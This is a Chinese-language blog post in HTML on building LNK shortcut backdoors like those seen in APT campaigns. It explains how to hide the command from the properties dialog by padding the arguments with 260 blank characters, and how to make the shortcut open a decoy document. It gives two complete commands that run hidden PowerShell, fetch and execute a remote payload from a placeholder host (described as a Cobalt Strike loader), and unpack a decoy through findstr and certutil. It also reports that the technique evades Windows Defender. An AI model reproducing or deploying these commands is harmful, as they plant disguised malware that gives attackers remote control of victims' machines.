<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.0.6" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.0.6">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.0.6">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.0.6">


  <link rel="mask-icon" href="/images/logo.svg?v=6.0.6" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '6.0.6',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="在针对APT攻击的报告中，我们常常可以看到LNK后门的出现，于是我就打算看看LNK后门的相关资料，于是就有了这篇文章… preview最简单的做法对参数进行隐藏伪装正常程序 最简单的做法最简单的LNK后门就是在创建LNK后门的时候选择以最小化窗口运行，然后链接向cmd或者powershell进行payload的下载执行，最后替换一下LNK文件的图标。这样可以做到受害者在双击LNK文件时无弹窗运行p">
<meta name="keywords" content="lnk backdoor">
<meta property="og:type" content="article">
<meta property="og:title" content="th-LNK文件后门">
<meta property="og:url" content="localhost/2019/04/04/th-LNK文件后门/index.html">
<meta property="og:site_name" content="Kiwings">
<meta property="og:description" content="在针对APT攻击的报告中，我们常常可以看到LNK后门的出现，于是我就打算看看LNK后门的相关资料，于是就有了这篇文章… preview最简单的做法对参数进行隐藏伪装正常程序 最简单的做法最简单的LNK后门就是在创建LNK后门的时候选择以最小化窗口运行，然后链接向cmd或者powershell进行payload的下载执行，最后替换一下LNK文件的图标。这样可以做到受害者在双击LNK文件时无弹窗运行p">
<meta property="og:locale" content="default">
<meta property="og:image" content="/images/lnk_backdoor/remote.png">
<meta property="og:image" content="/images/lnk_backdoor/local1.png">
<meta property="og:updated_time" content="2019-06-30T02:00:07.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="th-LNK文件后门">
<meta name="twitter:description" content="在针对APT攻击的报告中，我们常常可以看到LNK后门的出现，于是我就打算看看LNK后门的相关资料，于是就有了这篇文章… preview最简单的做法对参数进行隐藏伪装正常程序 最简单的做法最简单的LNK后门就是在创建LNK后门的时候选择以最小化窗口运行，然后链接向cmd或者powershell进行payload的下载执行，最后替换一下LNK文件的图标。这样可以做到受害者在双击LNK文件时无弹窗运行p">
<meta name="twitter:image" content="/images/lnk_backdoor/remote.png">



  <link rel="alternate" href="/atom.xml" title="Kiwings" type="application/atom+xml">




  <link rel="canonical" href="localhost/2019/04/04/th-LNK文件后门/">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>th-LNK文件后门 | Kiwings</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"> 

<div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Kiwings</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        
          
  <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>
</li>

      
        
        
          
  <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>
</li>

      
        
        
          
  <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br>Categories</a>
</li>

      
        
        
          
  <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>
</li>

      
        
        
          
  <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br>About</a>
</li>

      

      
    </ul>
  

  
    

    
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
    

  


  

  
</nav>


  



 </div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="localhost/2019/04/04/th-LNK文件后门/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Kiwings">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Kiwings">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">th-LNK文件后门</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-04-04T00:00:00+00:00">2019-04-04</time>
            

            
            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing"><a href="/categories/technology/" itemprop="url" rel="index"><span itemprop="name">technology</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>在针对APT攻击的报告中，我们常常可以看到LNK后门的出现，于是我就打算看看LNK后门的相关资料，于是就有了这篇文章…</p>
<h2 id="preview"><a href="#preview" class="headerlink" title="preview"></a>preview</h2><p>最简单的做法<br>对参数进行隐藏<br>伪装正常程序</p>
<h2 id="最简单的做法"><a href="#最简单的做法" class="headerlink" title="最简单的做法"></a>最简单的做法</h2><p>最简单的LNK后门就是在创建LNK后门的时候选择以最小化窗口运行，然后链接向cmd或者powershell进行payload的下载执行，最后替换一下LNK文件的图标。这样可以做到受害者在双击LNK文件时无弹窗运行payload。<br>这种简单的方法缺点也很明显，第一点就是当对方点开了查看属性的时候，会直接暴露将要被执行的命令。第二点则是因为不管运行几次该LNK文件都不会产生任何反应，会让对方产生怀疑。</p>
<h2 id="对参数进行隐藏"><a href="#对参数进行隐藏" class="headerlink" title="对参数进行隐藏"></a>对参数进行隐藏</h2><p>由于微软对快捷方式中的参数字段存在长度限制，只能添加260个字节，超过该字节数后则无法正常显示参数字段中的字符，但是不影响其功能。因此我们可以先利用260个空白字符对参数字段进行填充，然后再加上需要执行的命令。这样就可以达到参数隐藏的目的。</p>
<h2 id="伪装正常程序"><a href="#伪装正常程序" class="headerlink" title="伪装正常程序"></a>伪装正常程序</h2><p>光是隐藏参数还不能算一个合格的后门，因为当对方运行了该LNK文件后，发现没有任何的反应是会产生怀疑的，所以我们还需要伪装成能正常打开的文件(可以是PE文件也可以是WORD文档或者图片等任意格式)。有两个思路可以完成该目的。第一种是将文件放在远程服务器上，利用命令行的远程下载执行的方式将其打开。第二种则是将要伪装的目标文件藏在LNK文件自身中，通过命令行的相关命令将其释放并执行。前者有下载行为、后者则是会增大LNK文件的大小。我个人比较喜欢用后者，能减少下载操作的情况下尽量减少下载操作。</p>
<h3 id="通过下远程下载执行打开正常文件"><a href="#通过下远程下载执行打开正常文件" class="headerlink" title="通过下远程下载执行打开正常文件"></a>通过下远程下载执行打开正常文件</h3><p>大致流程图如下所示</p>
<p><img src="/images/lnk_backdoor/remote.png" alt="remote download"></p>
<p>这里贴一个具体的EXP代码</p>
<pre><code>%SystemRoot%\system32\cmd.exe /s /c powershell -w hidden -c (new-object net.webclient).downloadfile(&apos;http://x.x.x.x/download/test.doc&apos;, &apos;C:\\Users\\Public\\Downloads\\test.doc&apos;) &amp; powershell -w hidden -c C:\\Users\\Public\\Downloads\\test.doc &amp; powershell -w hidden -c &quot;iex (new-object net.webclient).downloadstring(&apos;http://x.x.x.x/a&apos;)&quot;
</code></pre><p>代码很简单，一共打开了三次powershell(用&amp;连接)，</p>
<pre><code>powershell -w hidden -c (new-object net.webclient).downloadfile(&apos;http://x.x.x.x/download/test.doc&apos;, &apos;C:\\Users\\Public\\Downloads\\test.doc&apos;)
#这段powershell利用downloadfile从远程服务器下载指定的内容保存到本地指定路径上(文件需要命名为对应的后缀)

powershell -w hidden -c C:\\Users\\Public\\Downloads\\test.doc
#这段powerhslel以系统支持的方式打开该文件

powershell -w hidden -c &quot;iex (new-object net.webclient).downloadstring(&apos;http://x.x.x.x/a&apos;)&quot;
#这段powershell是coabltstrike加载powershell payload的命令。
</code></pre><p>上述只是其中一个例子，下载操作也可以利用其他方式进行，思路就是将文件下载到本地后利用命令行打开该文件，以达到伪装正常文件的效果。</p>
<h3 id="将文件藏到LNK文件自身结构体中"><a href="#将文件藏到LNK文件自身结构体中" class="headerlink" title="将文件藏到LNK文件自身结构体中"></a>将文件藏到LNK文件自身结构体中</h3><p>这个思路充分利用了LNK文件自己结构体的特点，将需要伪装的文件藏在自身中，是一个十分有意思的技巧。<br>具体来讲，在LNK文件中有一个Extradata结构，官方文档是这样描述该结构的</p>
<blockquote>
<p>ExtraData refers to a set of structures that convey additional information about a link target. These optional structures can be present in an extra data section that is appended to the basic Shell Link Binary File Format.</p>
</blockquote>
<p>意思是说extraData是一组用于传达有关链接目标的其他信息的结构。这些可选结构可以存在于附加到基本Shell链接二进制文件格式的额外数据部分。<br>也就是说，ExtraData结构主要是用于传达信息的，不会影响LNK文件的正常执行，于是我们可以滥用该结构。</p>
<p>大致流程图如下</p>
<p><img src="/images/lnk_backdoor/local1.png" alt="hidden in self"></p>
<p>这里也贴一个具体的EXP代码<br>    %COMSPEC% findstr “0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAA” test.lnk&gt;%TEMP%\test<br>    &amp; certutil -decode %TEMP%\test %TEMP%\test.doc<br>    &amp; start %TEMP%\test.doc<br>    &amp; powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘<a href="http://x.x.x.x/update&#39;))&quot;" target="_blank" rel="noopener">http://x.x.x.x/update&#39;))&quot;</a> &amp; exit</p>
<p>代码逻辑则如流程图给出的一样，这里就不重复了。</p>
<p>这种方式的好处就是可以尽量减少网络连接数，避免被IPS等流量监控设备发现。</p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>能过windwos defender(需要绕过AMSI)、不能过360(限制得太死了，添加任意启动参数都会拦截)</p>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/lnk-backdoor/" rel="tag"># lnk backdoor</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/04/04/th-DLL劫持/" rel="next" title="th-DLL劫持">
                <i class="fa fa-chevron-left"></i> th-DLL劫持
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/04/27/随笔/" rel="prev" title="随笔杂记">
                随笔杂记 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Kiwings</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">9</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">3</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">8</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#preview"><span class="nav-number">1.</span> <span class="nav-text">preview</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#最简单的做法"><span class="nav-number">2.</span> <span class="nav-text">最简单的做法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#对参数进行隐藏"><span class="nav-number">3.</span> <span class="nav-text">对参数进行隐藏</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#伪装正常程序"><span class="nav-number">4.</span> <span class="nav-text">伪装正常程序</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#通过下远程下载执行打开正常文件"><span class="nav-number">4.1.</span> <span class="nav-text">通过下远程下载执行打开正常文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#将文件藏到LNK文件自身结构体中"><span class="nav-number">4.2.</span> <span class="nav-text">将文件藏到LNK文件自身结构体中</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#总结"><span class="nav-number">4.3.</span> <span class="nav-text">总结</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Kiwings</span>

  

  
</div>




  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/theme-next/hexo-theme-next">NexT.Muse</a> v6.0.6</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.0.6"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.0.6"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.0.6"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.0.6"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.0.6"></script>



  



	





  





  










  





  

  

  

  

  
  

  

  

  

  

</body>
</html>
